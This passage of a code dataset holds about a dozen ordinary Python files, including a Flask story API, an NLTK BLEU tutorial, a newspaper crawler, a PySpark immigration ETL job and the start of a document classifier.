methods=['DELETE'])\n@login_required\ndef delete_story(id):\n story = Story.query.get(id)\n if not story:\n return jsonify('story not found')\n db.session.delete(story)\n db.session.commit()\n return jsonify('deleted')\n\n\n# Get all the stories written by a single user\n@story_routes.route('/user/')\ndef user_stories():\n stories_by_user = Story.query.all()\n return {'stories': [story.to_dict() for story in stories_by_user]}\n\n\n# Post a comment Route\n@story_routes.route('//comment', methods=['POST'])\ndef post_comment(id):\n story_id = Story.query.get(id).id\n user_id = User.query.filter_by(username = request.json['author']).first().id\n comment = request.json['comment']\n \n new_comment = Comment(user_id, story_id, comment)\n db.session.add(new_comment)\n db.session.commit()\n\n return new_comment.to_dict()\n\n\n# Post a like\n@story_routes.route('//like', methods=['POST'])\ndef post_like(id):\n story_id = Story.query.get(id).id\n user_id = User.query.filter_by(username = request.json['user']).first().id\n like = Like.query.filter(Like.story_id == id).filter(Like.user_id == user_id).first()\n # count = 1\n if like:\n like.count = like.count + 1\n db.session.add(like)\n db.session.commit()\n return 
like.to_dict()\n    else:\n        new_like = Like(user_id, story_id, count=1)\n        db.session.add(new_like)\n        db.session.commit()\n        return new_like.to_dict()\n","sub_path":"app/api/story_routes.py","file_name":"story_routes.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"504942110","text":"from compas.numerical import drx_numba\nfrom compas.datastructures import Network\nfrom compas_viewers.vtkviewer import VtkViewer\n\nm = 150\np = [(i / m - 0.5) * 5 for i in range(m + 1)]\nnodes = [[xi, yi, 0] for yi in p for xi in p]\nedges = []\n\nfor i in range(m):\n    for j in range(m):\n\n        s = (m + 1)\n        p1 = (j + 0) * s + i + 0\n        p2 = (j + 0) * s + i + 1\n        p3 = (j + 1) * s + i + 0\n        p4 = (j + 1) * s + i + 1\n\n        edges.append([p1, p2])\n        edges.append([p1, p3])\n\n        if j == m - 1:\n            edges.append([p4, p3])\n\n        if i == m - 1:\n            edges.append([p2, p4])\n\nnetwork = Network.from_nodes_and_edges(nodes, edges)\nsides = [i for i in network.nodes() if network.degree(i) <= 2]\nnetwork.update_default_node_attributes({'P': [0, 0, 1000 / network.number_of_nodes()]})\nnetwork.update_default_edge_attributes({'E': 100, 'A': 1, 'ct': 't'})\nnetwork.nodes_attributes(keys=sides, names='B', values=[[0, 0, 0]])\n\ndrx_numba(network=network, tol=0.01, summary=1, update=1)\n\ndata = {\n    'nodes': [network.node_coordinates(i) for i in network.nodes()],\n    'edges': [{'nodes': uv} for uv in network.edges()]\n}\n\nviewer = VtkViewer(data=data)\n# viewer.node_size = 0\nviewer.setup()\nviewer.start()\n","sub_path":"__temp/fofin-structures/fofin-dense-numba.py","file_name":"fofin-dense-numba.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"236121076","text":"__author__ = 'Pontus'\nimport numpy as np\n\ndef gram(docs1, docs2, kernel):\n    g = []\n    for d1 in docs2:\n        g2 = []\n        for d2 in docs1:\n            g2.append(kernel(d1, d2))\n        g.append(np.array(g2))\n    return np.array(g)","sub_path":"kernels/gram.py","file_name":"gram.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"506883406","text":"from queue import Queue\nfrom threading import Thread\n\nfrom elasticsearch_raven import configuration\nfrom elasticsearch_raven.transport import ElasticsearchTransport\nfrom elasticsearch_raven.transport import SentryMessage\n\ntransport = ElasticsearchTransport(configuration.host, configuration.use_ssl)\nblocking_queue = Queue()\n\n\ndef send():\n    while True:\n        message = blocking_queue.get()\n        transport.send(message)\n        blocking_queue.task_done()\n\n\nsender = Thread(target=send)\nsender.start()\n\n\ndef application(environ, start_response):\n    length = int(environ.get('CONTENT_LENGTH', '0'))\n    data = environ['wsgi.input'].read(length)\n    blocking_queue.put(SentryMessage.create_from_http(\n        environ['HTTP_X_SENTRY_AUTH'], data))\n\n    status = '200 OK'\n    response_headers = [('Content-Type', 'text/plain')]\n    start_response(status, response_headers)\n    return [''.encode('utf-8')]\n","sub_path":"elasticsearch_raven/wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"652001548","text":"import random\n\ni = 0\n\nxnum = random.randint(1, 10)\n\nwhile i < 3:\n\tprint('****************')\n\tnum = int(input(\"Please input a number between 1 and 10\\n\"))\n\n\tx = 2 - 
i\n\n\tif num == xnum:\n\t\tprint(\"Yes, you guessed it right!\")\n\t\tbreak\n\telif num > xnum:\n\t\tprint(\"Bigger than the random number, only %d chance(s) left\" % x)\n\telif num < xnum:\n\t\tprint(\"Smaller than the random number, only %d chance(s) left\" % x)\n\n\ti += 1","sub_path":"python3/training/猜字游戏_三次随机数一样.py","file_name":"猜字游戏_三次随机数一样.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"74521885","text":"'''\r\nAuthor: Luke Hebert\r\nDate begun: February 20th, 2021?\r\nDescription:\r\n\ttake expression profile results (log-fold change data from experiments)\r\n\t\tand {transcripts:genenames} pickled dictionary\r\n\t\tand more raw .csv files that include padj values\r\n\tcreate variations of bar graphs to depict data\r\n\toutput each graph version style in a separate folder\r\n'''\r\n\r\n#import necessary libraries\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport sys, os, pickle\r\n\r\n#assign a slash symbol based on the current machine's operating system\r\nslash = '\\\\' if os.name == 'nt' else '/'\r\n#store input file pathway and also save input folder\r\nin_folder_path = sys.argv[1]\r\nin_files_list = []\r\nfor root,dirs,files in os.walk(in_folder_path):\r\n\tin_files_list.extend(files)\r\n\tbreak\r\n\r\n#load the pickled dictionary of {'transcripts':'genenames'}\r\nfor file_name in in_files_list:\r\n\tif '.pkl' in file_name:\r\n\t\tgene_dict = pickle.load(open(file_name,\"rb\"))\r\n\r\n\r\n#load adjusted p values from the \"padj\" files, filtered by padj .05 & log2fold 2/-2\r\npadj_dict = {}\r\nfor file_name in in_files_list:\r\n\tif 'padj' in file_name:\r\n\t\twith open(in_folder_path+slash+file_name) as in_file:\r\n\t\t\tfor i,line in enumerate(in_file):\r\n\t\t\t\tline_list = line.replace('\\r','').replace('\\n','').split('\\t')\r\n\t\t\t\tif i == 0:\r\n\t\t\t\t\tpass\r\n\t\t\t\telif line_list[2]!='NA' and line_list[6]!='NA':\r\n\t\t\t\t\ttranscript = line_list[0].replace('\\\"','').replace(',',';')\r\n\t\t\t\t\tlog2fold = float(line_list[2])\r\n\t\t\t\t\tpadj = float(line_list[6])\r\n\t\t\t\t\t#line_list2 is the logbase2foldchange & line_list6 is adjusted p value\r\n\t\t\t\t\tif (log2fold >= 2 or log2fold <= -2) and padj < 0.05:\r\n\t\t\t\t\t\tpadj_dict[gene_dict[transcript]]=padj\r\n\r\n\r\n#read in logfold2 data to a dictionary for making graphs\r\nout_dict = {}\r\nfor file_name in in_files_list:\r\n\tif 'Fig' in file_name:\r\n\t\tout_dict[file_name[:-4]] = {'gene':[],'log2float':[],'label':[], 'padj':[]}\r\n\t\twith open(in_folder_path+slash+file_name) as in_file:\r\n\t\t\tfor line in in_file:\r\n\t\t\t\tline_list = line.replace('\\r','').replace('\\n','').split(',')\r\n\t\t\t\tout_dict[file_name[:-4]]['gene'].append('$\\it{'+line_list[0]+'}$')\r\n\t\t\t\tout_dict[file_name[:-4]]['log2float'].append(float(line_list[1]))\r\n\t\t\t\tout_dict[file_name[:-4]]['label'].append(line_list[2].replace('WNT','$\\it{WNT}$'))\r\n\t\t\t\tout_dict[file_name[:-4]]['padj'].append(\"{:.2e}\".format( float(padj_dict[line_list[0]]) ))\r\n\t\t\t\t\t#formatting tip from here: https://stackoverflow.com/questions/6913532/display-a-decimal-in-scientific-notation\r\n\r\n\r\n\r\n#for each input file, cycle through the dictionary and call the graphing function for each item (and output)\r\nfor graph in out_dict:\r\n\r\n\t'''\r\n\t#sort the graphing dictionary by foldchange\r\n\tzipped_list = list( zip(out_dict[graph]['gene'], out_dict[graph]['log2float'], out_dict[graph]['label'], out_dict[graph]['padj']) 
)\r\n\tzipped_list.sort(key=lambda x:x[1]) #sort based on log2float\r\n\tout_dict[graph]['gene'] = [x for x, this, that, other in zipped_list]\r\n\tout_dict[graph]['label'] = [x for this, that, x, other in zipped_list]\r\n\tout_dict[graph]['padj'] = [x for this, that, other, x in zipped_list]\r\n\t'''\r\n\r\n\tout_folder=in_folder_path+slash+graph+slash\r\n\tif not os.path.exists(out_folder):\r\n\t\tos.makedirs(out_folder)\r\n\t\tprint('\\nOutputting:\\t' + str(out_folder))###\r\n\telse:\r\n\t\tprint('This folder already exists and was therefore not overwritten: '+out_folder)\r\n\r\n\r\n\t#make a list of all combination tuples, which will be iterated over to create\r\n\t\t#graphs of varying properties; tuples should be of the format:\r\n\t\t#(gridcolor, palette name, orientation, dodge boolean)\r\n\tgraph_versions = (\r\n\t('darkgrid','Accent','h',False),\r\n\t('darkgrid','Set1_r','h',False),\r\n\t('darkgrid','Set3','h',False),\r\n\t('darkgrid','colorblind','h',False),\r\n\t('darkgrid','pastel','h',False)\r\n\t)\r\n\t#loop through all graph version combinations\r\n\t\t#create, save, and clear the figure for each version\r\n\tfor details_tup in graph_versions:\r\n\t\tgridcolor, palette_name, orientation, dodge_bool = details_tup\r\n\t\tif len(set(out_dict[graph]['gene']))>25:\r\n\t\t\tplt.figure(figsize=(8,10))\r\n\t\tsns.set_theme(style=gridcolor,palette=palette_name)\r\n\t\t#avoid repeat y axis value issue by manually setting y tick labels and\r\n\t\t\t#using the indexes of x values for y values (stored in range_list)\r\n\t\trange_list=[]\r\n\t\tfor i,item in enumerate(out_dict[graph]['log2float']):\r\n\t\t\trange_list.append(i)\r\n\t\tax=sns.barplot(x=out_dict[graph]['log2float'],\r\n\t\t\t\t\t\ty=range_list,\r\n\t\t\t\t\t\tdodge=dodge_bool,#avoid tiny bar widths\r\n\t\t\t\t\t\thue=out_dict[graph]['label'],\r\n\t\t\t\t\t\torient=orientation)\r\n\t\tax.set_yticklabels(out_dict[graph]['gene'])\r\n\t\t#add padj values near the bars\r\n\t\tfor i in range(len(out_dict[graph]['gene'])):\r\n\t\t\tif out_dict[graph]['log2float'][i] > 0:\r\n\t\t\t\thoriz_adj = 'left'\r\n\t\t\telse:\r\n\t\t\t\thoriz_adj = 'right'\r\n\r\n\t\t\tax.text(out_dict[graph]['log2float'][i], i+0.25, str(out_dict[graph]['padj'][i]),\r\n\t\t\t\t\tfontdict=dict(color='red',fontsize=6),\r\n\t\t\t\t\tha=horiz_adj, va='baseline')\r\n\t\t#add gene names inside the bars\r\n\t\tfor i in range(len(out_dict[graph]['gene'])):\r\n\t\t\tax.text(out_dict[graph]['log2float'][i]/2, i+0.25, str(out_dict[graph]['gene'][i]),\r\n\t\t\t\t\tfontdict=dict(color='black',fontsize=6),\r\n\t\t\t\t\tha='center', va='baseline')\r\n\t\tax.figure.savefig(''.join([out_folder,slash,graph,'_',orientation,'_',gridcolor[0:4],'_',palette_name,'.png']),dpi=800)\r\n\t\tplt.close() #clear the current figure to make room for next one\r\n\r\n\r\n#keeping this code below in case I ever need to switch back to \"vertical\" barplot orientation\r\n'''\r\n\t#horizontal, light =========================================================\r\n\tif len(set(out_dict[graph]['gene']))>25:\r\n\t\tplt.figure(figsize=(8,5))\r\n\tsns.set_theme(style=\"whitegrid\",palette='colorblind')\r\n\tax=sns.barplot(x=out_dict[graph]['gene'],\r\n\t\t\t\t\ty=out_dict[graph]['log2float'],\r\n\t\t\t\t\tdodge=boolboi,#avoid tiny bar widths\r\n\t\t\t\t\thue=out_dict[graph]['label'],\r\n\t\t\t\t\torient='v')\r\n\tif len(set(out_dict[graph]['gene']))>25:\r\n\t\tplt.setp(ax.get_xticklabels(), rotation=-45)\r\n\telse:\r\n\t\tplt.setp(ax.get_xticklabels(), 
rotation=-30)\r\n\tax.figure.savefig(''.join([out_folder,slash,graph,'_v','_light.png']),dpi=800)\r\n\tplt.close() #clear the current figure to make room for next one\r\n'''\r\n","sub_path":"createExpressionGraphs_20210307A.py","file_name":"createExpressionGraphs_20210307A.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"50597053","text":"#!/usr/bin/python3\n# coding: utf-8\nfrom nltk.translate.bleu_score import sentence_bleu\nfrom nltk.translate.bleu_score import corpus_bleu\n\n##################################################################\n## 一: sentence_bleu: Calculate BLEU score (Bilingual Evaluation Understudy)\n# sentence_bleu(references, hypothesis, weights=(0.25, 0.25, 0.25, 0.25), smoothing_function=None, auto_reweigh=False, emulate_multibleu=False)\n# 参考语句必须作为语句列表来提供, 其中每个语句是一个记号列表, 候选语句作为一个记号列表被提供\nreference = [['this', 'is', 'a', 'test'], ['this', 'is' 'test']]\ncandidate = ['this', 'is', 'a', 'test']\nscore = sentence_bleu(reference, candidate)\nprint(score) # 会输出一个满分, 因为候选语句完全匹配其中一个参考语句\n\nreference = [['the', 'cat', \"is\", \"sitting\", \"on\", \"the\", \"mat\"]]\ntest = [\"on\", 'the', \"mat\", \"is\", \"a\", \"cat\"] # The hypothesis contains 0 counts of 4-gram overlaps.\nprint(sentence_bleu(reference, test)) # 5.5546715329196825e-78\ntest = ['the', 'cat', 'is', 'sitting', 'on', 'mat']\nprint(sentence_bleu(reference, test)) # 0.6731821382417487\n\n##################################################################\n## 二: corpus_bleu: 计算多个句子(如段落或文档)的 BLEU 分数\n# 参考文本必须被指定为文档列表, 其中每个文档是一个参考语句列表, 并且每个可替换的参考语句也是记号列表, 也就是说文档列表是记号列表的列表的列表\n# 候选文档必须被指定为列表, 其中每个文件是一个记号列表, 也就是说候选文档是记号列表的列表\n\nreferences = [[['this', 'is', 'a', 'test'], ['this', 'is' 'test']]] # two references for one document\ncandidates = [['this', 'is', 'a', 'test']]\nscore = corpus_bleu(references, candidates)\nprint(score) # 1.0; 运行这个例子就像之前一样输出满分\n\n##################################################################\n## 累加和单独的 BLEU 分数\n# NLTK 中提供的 BLEU 评分方法允许你在计算 BLEU 分数时为不同的 n 元组指定权重\n# 这使你可以灵活地计算不同类型的 BLEU 分数, 如单独和累加的 n-gram 分数\n\n## 单独的 N-Gram 分数\n# 单独的 N-gram 分数是对特定顺序的匹配 n 元组的评分, 例如单个单词(称为 1-gram)或单词对(称为 2-gram 或 bigram)\n# 权重被指定为一个数组, 其中每个索引对应相应次序的 n 元组\n# 仅要计算 1-gram 匹配的 BLEU 分数, 你可以指定 1-gram 权重为 1, 对于 2 元, 3 元和 4 元指定权重为 0, 也就是权重为(1, 0, 0, 0):\n\n## 1-gram individual BLEU\nreference = [['this', 'is', 'small', 'test']]\ncandidate = ['this', 'is', 'a', 'test']\nscore = sentence_bleu(reference, candidate, weights=(1, 0, 0, 0)); print(score) # 0.75\n\n## 我们可以重复这个例子, 对于从 1 元到 4 元的各个 n-gram 运行语句如下所示:\n# n-gram individual BLEU\nreference = [['this', 'is', 'a', 'test']]\ncandidate = ['this', 'is', 'a', 'test']\nprint('Individual 1-gram: %f' % sentence_bleu(reference, candidate, weights=(1, 0, 0, 0))) # 1.000000\nprint('Individual 2-gram: %f' % sentence_bleu(reference, candidate, weights=(0, 1, 0, 0))) # 1.000000\nprint('Individual 3-gram: %f' % sentence_bleu(reference, candidate, weights=(0, 0, 1, 0))) # 1.000000\nprint('Individual 4-gram: %f' % sentence_bleu(reference, candidate, weights=(0, 0, 0, 1))) # 1.000000\n# 虽然我们可以计算出单独的 BLEU 分数, 但这并不是使用这个方法的初衷, 而且得出的分数也没有过多的含义, 或者看起来具有说明性\n\n##################################################################\n## 累加的 N-Gram 分数\n# 累加分数是指对从 1 到 n 的所有单独 n-gram 分数的计算, 通过计算加权几何平均值来对它们进行加权计算\n# 默认情况下, sentence_bleu() 和 corpus_bleu()分数计算累加的 4 元组 BLEU 分数, 也称为 BLEU-4 分数\n# BLEU-4 对 1 元组, 2 元组, 3 元组和 4 元组分数的权重为 1/4(25 %)或 0.25\n\nreference = [['this', 'is', 'small', 
'test']]\ncandidate = ['this', 'is', 'a', 'test']\nscore = sentence_bleu(reference, candidate, weights=(0.25, 0.25, 0.25, 0.25)); print(score) # 0.707106781187\nprint()\n\n## cumulative BLEU scores\nreference = [['this', 'is', 'small', 'test']]\ncandidate = ['this', 'is', 'a', 'test']\nprint('Cumulative 1-gram: %f' % sentence_bleu(reference, candidate, weights=(1, 0, 0, 0))) # 0.750000\nprint('Cumulative 2-gram: %f' % sentence_bleu(reference, candidate, weights=(0.5, 0.5, 0, 0))) # 0.500000\nprint('Cumulative 3-gram: %f' % sentence_bleu(reference, candidate, weights=(0.33, 0.33, 0.33, 0))) # 0.632878\nprint('Cumulative 4-gram: %f' % sentence_bleu(reference, candidate, weights=(0.25, 0.25, 0.25, 0.25))) # 0.707107\n# 结果的差别很大, 比单独的 n-gram 分数更具有表达性\n# 在描述文本生成系统的性能时, 通常会报告从 BLEU-1 到 BLEU-4 的累加分数\n\n##################################################################\n## 在这一节中, 我们试图通过一些例子来进一步获取对 BLEU 评分的直觉\n# 我们在语句层次上通过用下面的一条参考句子来说明:\n# the quick brown fox jumped over the lazy dog\n\n## 首先, 我们来看一个完美的分数\n# prefect match\nfrom nltk.translate.bleu_score import sentence_bleu\nreference = [['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog']]\ncandidate = ['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog']\nscore = sentence_bleu(reference, candidate); print(score) # 1.0\n\n# one word different\nreference = [['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog']]\ncandidate = ['the', 'fast', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog'] # 把\" quick \"改成\" fast \"\nscore = sentence_bleu(reference, candidate); print(score) # 0.7506238537503395\n\n# two words different\nreference = [['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog']]\ncandidate = ['the', 'fast', 'brown', 'fox', 'jumped', 'over', 'the', 'sleepy', 'dog'] # 把\" quick \"改成\" fast \", 把\" lazy \"改成\" sleepy \"\nscore = sentence_bleu(reference, candidate); print(score) # 0.4854917717073234\n\n# all words different\nreference = [['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog']]\ncandidate = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i']\nscore = sentence_bleu(reference, candidate); print(score) # 0.0\n\n# 现在, 让我们尝试一个比参考语句的词汇更少(例如, 放弃最后两个词)的候选语句, 但这些单词都是正确的\n# shorter candidate\nreference = [['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog']]\ncandidate = ['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the']\nscore = sentence_bleu(reference, candidate); print(score) # 0.7514772930752859\n# 结果和之前的有两个单词错误的情况很相似\n\n# 如果我们把候选语句调整为比参考语句多两个单词, 那又会怎么样?\n# longer candidate\nreference = [['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog']]\ncandidate = ['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog', 'from', 'space']\nscore = sentence_bleu(reference, candidate); print(score) # 0.7860753021519787\n# 再一次, 我们可以看到, 我们的直觉是成立的, 得分还是有点像 \"有两个错字\" 的情况\n\n# 最后, 我们来比较一个很短的候选语句: 只有两个单词的长度。\n# very short\nreference = [['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog']]\ncandidate = ['the', 'quick']\nscore = sentence_bleu(reference, candidate); print(score) # 0.0301973834223185\n# 运行此示例首先会打印一条警告消息, 指出不能执行评估 3 元组及以上部分(直到 4 元组)。这是合乎情理的, 因为在候选语句中我们最多只能用 2 元组来运行\n","sub_path":"bin/template/src/jptnltk/l28_translate.py","file_name":"l28_translate.py","file_ext":"py","file_size_in_byte":7928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"492661643","text":"import datetime\nfrom bs4 import BeautifulSoup\nimport 
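# The closing BLEU example above warns that a two-word candidate cannot contribute
# any 3-gram or 4-gram matches. NLTK ships smoothing functions for exactly this
# case; a small sketch using method1, one of several methods SmoothingFunction offers.
from nltk.translate.bleu_score import sentence_bleu, SmoothingFunction

reference = [['the', 'quick', 'brown', 'fox', 'jumped', 'over', 'the', 'lazy', 'dog']]
candidate = ['the', 'quick']  # too short to contain any 3-grams or 4-grams

# Smoothing replaces the zero counts for the missing higher-order n-grams,
# avoiding the warning and the collapse of the score toward zero.
smoothie = SmoothingFunction().method1
print(sentence_bleu(reference, candidate, smoothing_function=smoothie))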
requests\nimport re\nfrom crawler_content import *\n\ndef get_info_main(url,headers):\n web_data = requests.get(url, headers=headers)\n web_data.encoding = 'utf-8' # 解决乱码问题\n soup = BeautifulSoup(web_data.text, 'lxml')\n # soup = BeautifulSoup(html,'lxml')\n banmian = soup.find_all(id='pageLink')\n\n # 选择理论版块,提取url\n for i in banmian:\n if '理论' in i.text :\n print('banmian: ' + i.text)\n url_temp = i.get('href')\n url_temp = url[0:-6] + url_temp[-6:]\n print('理论版url: ' + url_temp)\n get_info(url_temp, headers)\n\n\n#保存pdf; 调用json_save爬取下层网址并保存json\ndef get_info(url,headers):\n web_data = requests.get(url, headers=headers)\n web_data.encoding = 'utf-8' # 解决乱码问题\n soup = BeautifulSoup(web_data.text, 'lxml')\n\n #获取具体地址,爬取内容并保存json\n urls7 = soup.select('.news > ul > li > a ')\n for s in urls7:\n print(s.get('href'))\n '''\n http://paper.people.com.cn/rmrb/html/2018-08/02/nbs.D110000renmrb_07.htm\n http://paper.people.com.cn/rmrb/html/2018-08/02/nw.D110000renmrb_20180802_1-07.htm\n nw.D110000renmrb_20180802_1-07.htm'''\n s = re.findall('.*\\d\\d/\\d\\d/', url)[0] + s.get('href')\n print(s)\n json_save(s,headers)\n\n#按时间获取url\ndaystart = datetime.datetime.strptime(\"2020-07-01\", \"%Y-%m-%d\").date()\ndaystop = datetime.datetime.strptime(\"2020-07-02\",'%Y-%m-%d').date()\nurls = []\nwhile daystart <= daystop:\n day = daystart.strftime(\"%Y-%m/%d\")\n s = 'http://paper.people.com.cn/rmrb/html/'+day+'/nbs.D110000renmrb_01.htm'\n urls.append(s)\n daystart = daystart + datetime.timedelta(days=1)\n\nheaders = {\n 'User-Agent': 'Windows Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0'\n}\nfor url in urls:\n get_info_main(url,headers)\n ","sub_path":"skl/crawler/rmrb2020-07/crawler_rmrb.py","file_name":"crawler_rmrb.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"209882864","text":"\"\"\"\n crython/log\n ~~~~~~~~~~~\n\n Contains package logger.\n\"\"\"\n# pylint: disable=global-statement\nimport logging\n\nfrom crython import compat\n\n\nROOT_LOGGER = None\n\n\nif compat.py26:\n logging._loggerClass.getChild = lambda s, name: '{0}.{1}'.format(s.name, name) # pylint: disable=protected-access\n\n\ndef get_logger(name=None):\n \"\"\"\n Get a logger instance relative to the crython package.\n \"\"\"\n global ROOT_LOGGER\n\n if ROOT_LOGGER is None:\n ROOT_LOGGER = logging.getLogger()\n\n name = '.'.join((ROOT_LOGGER.name, name)) if name else None\n return logging.getLogger(name)\n","sub_path":"crython/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"341120978","text":"# imports\nimport pyspark.sql.functions as F\nimport pyspark.sql.types as T\nimport datetime\n\n# variables\ns3_bucket = \"s3:///\"\nraw_data_path = \"{}rawdata/\".format(s3_bucket)\nprocessed_data_path = \"{}processed/\".format(s3_bucket)\n\n# user definded functions\n@F.udf(T.TimestampType())\ndef convSasDate(daysCount):\n import datetime\n sas_ref = datetime.datetime(1960,1,1)\n try:\n return sas_ref + datetime.timedelta(days=int(daysCount))\n except:\n return daysCount\n\n\n# splitting immigration data into 2 datasets \n# first one is for immigrants\n# second one is for immigration data\n\n# process immigration data for immigrant\nus_immigrant = 
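# The crawler above calls requests.get with no timeout and assigns the encoding by
# hand. A hedged sketch of the same fetch step with a timeout and an HTTP status
# check; fetch_soup is an illustrative helper name, not part of the original script.
import requests
from bs4 import BeautifulSoup

def fetch_soup(url, headers, timeout=10):
    # A timeout keeps one stalled request from hanging the whole crawl,
    # and raise_for_status surfaces 4xx/5xx responses early.
    resp = requests.get(url, headers=headers, timeout=timeout)
    resp.raise_for_status()
    resp.encoding = 'utf-8'  # the target pages are UTF-8, as assumed above
    return BeautifulSoup(resp.text, 'lxml')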
spark.read.format('com.github.saurfang.sas.spark')\\\n.load(\"{}i94_immigration/18-83510-I94-Data-2016/i94_{}_sub.sas7bdat\".format(raw_data_path, month_year))\\\n.withColumn(\"gender\", F.when(F.col(\"gender\")==F.lit(\"X\"), F.lit(\"O\")).otherwise(F.col(\"gender\")))\\\n.select(\n F.col(\"cicid\").cast(T.IntegerType()).alias(\"cicid\"),\n F.col(\"i94res\").cast(T.IntegerType()).alias(\"from_country_code\"),\n F.col(\"i94bir\").cast(T.IntegerType()).alias(\"age\"),\n F.col(\"i94visa\").cast(T.IntegerType()).alias(\"visa_code\"),\n F.col(\"visapost\").alias(\"visa_post\"),\n F.col(\"occup\").alias(\"occupation\"),\n F.col(\"visatype\").alias(\"visa_type\"),\n F.col(\"biryear\").cast(T.IntegerType()).alias(\"birth_year\"),\n F.col(\"gender\")\n)\\\n.withColumn(\"monthYear\", F.lit(month_year))\n\n# write\nus_immigrant.write.partitionBy(\"monthYear\").mode(\"append\").parquet('{}immigrant/'.format(processed_data_path))\n\n\n# process immigration data for immigration stats\nus_immigration = spark.read.format('com.github.saurfang.sas.spark')\\\n.load(\"{}i94_immigration/18-83510-I94-Data-2016/i94_{}_sub.sas7bdat\".format(raw_data_path, month_year))\\\n.select(\n F.col(\"cicid\").cast(T.IntegerType()).alias(\"cicid\"),\n F.col(\"admnum\").cast(T.LongType()).alias(\"admnum\"),\n F.col(\"i94port\").alias(\"iata_code\"),\n F.col(\"i94addr\").alias(\"state_code\"),\n \"arrdate\",\"depdate\", \"dtaddto\", \"airline\", \"fltno\", \"entdepa\", \"entdepd\", \"entdepu\", \"matflag\"\n)\\\n.withColumn(\"arrival_date\", convSasDate(\"arrdate\"))\\\n.withColumn(\"departure_date\", convSasDate(\"depdate\"))\\\n.withColumn(\"deadline_departure\", F.unix_timestamp(\"dtaddto\", 'mmddyyyy').cast(T.TimestampType()))\\\n.withColumn(\"monthYear\", F.lit(month_year))\\\n.drop(\"arrdate\", \"depdate\", \"dtaddto\")\n\n# write\nus_immigration.write.partitionBy(\"monthYear\").mode('append').parquet('{}immigration/'.format(processed_data_path))\n\n\n\n\n","sub_path":"dags/transform/build__immigration.py","file_name":"build__immigration.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"261302336","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pandas as pd\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\n\n# !!!!! 
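# The convSasDate UDF above encodes the SAS convention of storing dates as day
# counts from 1960-01-01. The conversion can be sanity-checked without Spark;
# a standalone sketch (the sample day count below is illustrative).
import datetime

SAS_EPOCH = datetime.datetime(1960, 1, 1)

def sas_days_to_datetime(days):
    # Mirrors the UDF body: add the day count to the SAS epoch, and pass
    # non-numeric input through unchanged, as the try/except above does.
    try:
        return SAS_EPOCH + datetime.timedelta(days=int(days))
    except (TypeError, ValueError):
        return days

print(sas_days_to_datetime(20566))  # 2016-04-22 00:00:00
print(sas_days_to_datetime(None))   # None, passed through unchanged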
A Executer la premier fois !!!!!\n#nltk.download('punkt')\n#nltk.download('stopwords')\n\npath_csv = \"Tobacco3482.csv\"\n\ndef etude_des_classes(path_csv):\n df =pd.read_csv(path_csv)\n print(\"Nombres de classes : \", len(df['label'].value_counts()))\n print(\"Nombres d'elements : \", len(df['label']))\n print(\"Echantillons de la structure : \\n\", df.iloc[:3])\n sns.countplot(data=df,y='label', order = df['label'].value_counts().index)\n plt.show()\n \ndef recup_chemin(df):\n chemin_img = df[\"img_path\"]\n chemin_txt = []\n for elem in chemin_img:\n chemin_txt.append(elem.replace('jpg', 'txt'))\n \n return chemin_txt\n\ndef recup_fichier(path_csv,stopmot=False):\n df =pd.read_csv(path_csv)\n chemin_txt = recup_chemin(df)\n list_fichiers = []\n \n if (stopmot==True):\n print(\"Nombre de chemins : \", len(chemin_txt))\n for chemin in chemin_txt:\n with open(\"Tobacco3482-OCR/\"+chemin, 'r') as fichier:\n list_fichiers.append(fichier.read().replace('\\n', ''))\n print(\" doc recup (3482) : \", len(list_fichiers))\n\n \n stop_words = set(stopwords.words('english'))\n list_preprocess = []\n for fichier in list_fichiers:\n preprocess = []\n words = 